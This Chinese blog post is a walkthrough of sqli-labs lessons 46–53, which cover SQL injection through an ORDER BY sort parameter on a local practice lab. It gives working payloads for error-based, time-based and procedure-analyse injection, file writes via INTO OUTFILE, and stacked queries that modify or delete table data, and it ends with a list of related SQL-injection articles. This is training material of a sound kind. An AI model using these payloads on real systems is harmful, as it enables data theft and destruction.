less-46-47-48-49-50-51-52-53

原創 qq_44598397 2019-04-14 00:37

LESS-46在這裏插入圖片描述
1、order by的原理爲排序,所以通過sort+asc或desc的輸出是否相同便可知是否有使用到排序(ASC 代表結果會以由小往大的順序列出,而 DESC 代表結果會以由大往小的順序列出。如果兩者皆沒有被寫出的話,那我們就會用 ASC。)

輸入?Sort=1 desc在這裏插入圖片描述
輸入:?Sort=1 asc在這裏插入圖片描述
兩者不同說明這裏使用了order by在這裏插入圖片描述
1、報錯注入
輸入:http://127.0.0.1/sqlilabs/Less-46/?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ ),0x7e))–+在這裏插入圖片描述
2、延時注入:http://127.0.0.1/sqlilabs/Less-46/?sort=1 and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+在這裏插入圖片描述
(2)利用 procedure analyse 進行注入
procedure analyse 參數後注入,利用 procedure analyse 參數,我們可以執行報錯注入。同時,在 procedure analyse 和 order by 之間可以存在 limit 參數,在這裏插入圖片描述
輸入:http://127.0.0.1/sqlilabs/Less-46/?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)在這裏插入圖片描述
(3)輸出導入導出
http://127.0.0.1/sqlilabs/Less-46/?sort=1 into outfile “c://phpStudy//PHPTutorial//www//sqlilabs//Less-46//bb.txt”%23在這裏插入圖片描述在這裏插入圖片描述
Less-47

與上一題不同的是sql語句中有單引號閉合。
(1)報錯注入
輸入:http://127.0.0.1/sqlilabs/Less-47/?sort=1’ and extractvalue(1,concat(0x7e,(select database()),0x7e))–+在這裏插入圖片描述(2)延時注入
輸入:http://127.0.0.1/sqlilabs/Less-47/?sort=1’ and if(ascii(substr(database(),1,1)) =115,0,sleep(5))–+在這裏插入圖片描述
(3)procedure analyse輸入:http://127.0.0.1/sqlilabs/Less-47/?sort=1’ %20%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)–+在這裏插入圖片描述
LESS-48
本關與LESS-46相似但是沒有報錯輸出,故不能用報錯注入,其他相同,不詳寫
在這裏插入圖片描述
(1)延時注入
http://127.0.0.1/sqlilabs/Less-48/?sort=1 and if(ascii(substr(database(),1,1))=115,0,sleep(5))–+在這裏插入圖片描述
LESS-49
本題與47題相似但是沒有報錯注入,不詳寫在這裏插入圖片描述LESS-50
在這裏插入圖片描述
執行 sql 語句我們這裏使用的是 mysqli_multi_query()函數,而之前我們使用的是 mysqli _query(),區別在於 mysqli_multi_query()可以執行多個 sql 語句,而 mysqli_query()只能執行一個 sql 語句,那麼我們此處就可以執行多個 sql 語句進行注入,也就是我們之前提到的 statcked injection。 (可參考38題解釋)

(1)輸入:http://127.0.0.1/sqlilabs/Less-50/?sort=1 ; update food set username=‘world’ where id=2 --+在這裏插入圖片描述在這裏插入圖片描述Less-51
在這裏插入圖片描述
與上一題的區別爲這裏爲單引號閉合
輸入:http://127.0.0.1/sqlilabs/Less-51/?sort=1’ ; delete from food where id=‘3’–+在這裏插入圖片描述在這裏插入圖片描述LESS-52在這裏插入圖片描述
此處與less-50的區別爲,這裏沒有報錯輸出
輸入:http://127.0.0.1/sqlilabs/Less-52/?sort=1 ; insert into food(id,price,username) values (3,40,‘feel’)–+在這裏插入圖片描述Less-53
這裏和51題的區別爲,雖都爲單引號閉合但是此處沒有報錯輸出;在這裏插入圖片描述
Less-53
這裏和51題的區別爲,雖都爲單引號閉合但是此處沒有報錯輸出;在這裏插入圖片描述
輸入:http://127.0.0.1/sqlilabs/Less-53/?sort=1’ ; create table hello like users; 在這裏插入圖片描述在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

寬字節注入1

寬字節注入原理 GBK 佔用兩字節,即一個符號佔用兩個字節 ASCII佔用一字節 PHP中編碼爲GBK,函數執行添加的是ASCII編碼(添加的符號爲“\”),MYSQL默認字符集是GBK等寬字節字符集。 大家都知道%df’ 被PH

啊哈哈哈765 2020-07-07 22:32:51

寬字節注入2

注入基礎 之前我們在1中講了使用%df 但是沒必要總是使用%df 可以使用其他的 注入代碼分析 下圖第一個函數是替換單引號和雙引號 即將單引號前加斜槓 雙引號前加斜槓 函數功能其實和本身自帶函數功能一樣 記住 寬字節注入mysq

啊哈哈哈765 2020-07-07 22:32:51

sql注入學習第一篇---基礎

SQL注入原理 SQL注入攻擊指的是通過構建特殊的輸入作爲參數傳入Web應用程序,而這些輸入大都是SQL語法裏的一些組合, 通過執行SQL語句進而執行攻擊者所要的操作,其主要原因是程序沒有細緻地過濾用戶輸入的數據,致使非法數據侵

行走在风中 2020-07-07 21:40:09

i春秋2020新春公益賽 GYCTF有關SQL注入題復現

0x00 前言 最近這段時間參加過一些CTF在線競賽,做過一些Web題,發現SQL注入漏洞出現的頻率可真高!不過在做題中也get到了一些Web新知識,現在通過題目復現的方式總結一下。 0x01 blacklist 考點:堆疊注入+

Qwzf 2020-07-07 18:04:49

sql注入繞waf小Tips

因爲對上次比賽sql的題挺不甘心 所以又着重複習了一遍sql,並記錄了平常繞waf的點 手工bypass要點 先通過破壞關鍵字測試出攔截規則 之後進行鍼對性繞過 Mysql 前期詳解:傳送門 1.1、聯合注入 0x01 and繞過

想冲大厂的癞蛤蟆 2020-07-07 11:59:33

pikachu靶場之SQL注入

0x00 前言 手工注入忘的差不多了。。。還是需要多多練習 以下關卡都是稍微測以下存不存在sql注入,查下數據庫名啥的 沒有將所有字段都爆出來。 衝鴨~ 0x01 數字型注入(post) 因爲是數字型,直接在後面加上真命題,不需要

0nc3 2020-07-07 09:51:37

JavaWeb開發防止SQL、XSS注入

SQL注入簡介 SQL注入是比較常見的網絡攻擊方式之一,它不是利用操作系統的BUG來實現攻擊,而是針對程序員編程時的疏忽,通過SQL語句,實現無帳號登錄,甚至篡改數據庫。 SQL注入攻擊實例 比如在一個登錄界面,要求輸入用戶名

GreenRookie 2020-07-07 07:16:11

PHP魔法函數之magic_quotes_gpc

magic_quotes_gpc 魔法函數存在於PHP 5.3.4及以下版本,作用是對POST、GET、Cookie傳入的數據進行轉義處理,在輸入數據的特殊字符如 單引號(')、雙引號(")、反斜線(\)與 NULL(NULL 字

工科学生死板板 2020-07-06 15:38:15

WEB程序防SQL注入攻擊程序

場景: WEB程序容易被SQL注入攻擊,攻擊原理是在請求參數中傳入非法字符,造成SQL語句出現出現異常情況,已達到攻擊者想要的結果。 分析: 一般的攻擊者都是在傳入的請求參數上做文章,所以我們重點檢查的是request的參數,判斷requ

成都好男人 2020-07-06 07:55:56

淺談SQL注入(入門版)

淺談SQL注入 (篇幅較長,包含對SQL注入的分析) 目錄 一、SQL注入原理 二、SQL注入的探測語句 三、SQL注入的進一步注入 一、SQL注入的原理 解釋型語言:程序不需要編譯,程序在運行時才翻譯成機器語言,每執行

羽路星尘 2020-07-05 06:34:35

sql注入繞過

1、大小寫繞過 改變語句中單詞的大小寫即可,如:select=>SelEct 2、雙寫繞過 如下: ununionion seselectlect 3、內聯註釋繞過 內聯註釋就是把一些特有的僅在MYSQL上的語句放在 /!../

野九 2020-07-05 03:38:03

Java Web項目解決 sql 注入問題(過濾器進行過濾解決)

** 1、編寫過濾器類—SqlFilter.java ** package com.yl.zp.controller; import java.io.IOException; import java.util.Enumerat

HelloWord_Object 2020-07-04 14:45:27

網絡安全-sqlmap實戰之sqlilabs-Less9

目錄   類型 -dbs枚舉數據庫 --tables枚舉數據庫表 --columns枚舉列 --dump枚舉數據 查看源代碼 類型 時間盲注-單引號 -dbs枚舉數據庫 使用-o參數優化,,--technique參數指定技術,--batc

lady_killer9 2020-07-04 12:44:44

SQL注入的方式與防治

 所謂的SQL注入、XSS、溢出等的漏洞,歸根到底,就是代碼注入的問題,導致代碼注入漏洞的產生的原因是因爲代碼和數據沒有分離,即程序所處理的數據和程序的代碼混在了一起,沒有明確的區分。。。$oM>?h_ =  ok:L]8UN 3

cduter 2020-07-04 09:33:01

齊博CMS變量覆蓋導致sql注入漏洞分析

齊博CMS變量覆蓋導致sql注入漏洞分析 漏洞具體詳情見http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13。 1. 根據阿里文章會員中心評論管理member

xyw55 2020-07-04 03:53:24